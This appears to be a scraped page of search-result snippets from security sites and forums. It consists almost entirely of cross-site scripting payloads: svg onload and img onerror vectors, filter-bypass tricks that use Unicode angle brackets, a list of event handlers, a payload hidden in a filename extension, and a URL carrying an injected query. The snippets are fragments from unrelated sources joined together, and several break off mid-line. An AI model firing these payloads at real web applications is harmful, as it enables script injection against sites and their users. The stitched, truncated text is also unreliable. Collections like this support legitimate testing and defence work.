“><svg/onload=confirm(1)
var/onmouseover="prompt(1)">On Mouse Over</var> "><img src=k.png onerror=alert(/1/.source) /> “><svg/onload=confirm(1)// "><h1>xss</h1>! <
XSS (Cross Site Scripting) - HackTricks
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
Got an email from our website... I think someone tried to hack us : xss
Name: '"><svg/onload=confirm(/OPENBUGBOUNTY/)>.
SalmonSec
<svg onload=alert(1)//. Bypass inequality symbols. Unicode Character U+FF1C and U+FF1E.
XSS payloads | by Pravinrp | Medium
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1.
Cross Site Scripting (XSS) - Book of BugBounty Tips
Use <svg onload=alert(1)> payload as file extension. When extension reflects in html. Sometime developers validate filename and forgot to validate extension.
Методы обхода защитных средств веб-приложений при... / Хабр
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
SVG XSS attempt on Joomla 4.2.5 - Joomla! Forum - community, help...
here is a query link: site.com?q=%27>"<svg/onload=confirm(%27testing-xss1%27)>&s=%27>"<svg/onload=confirm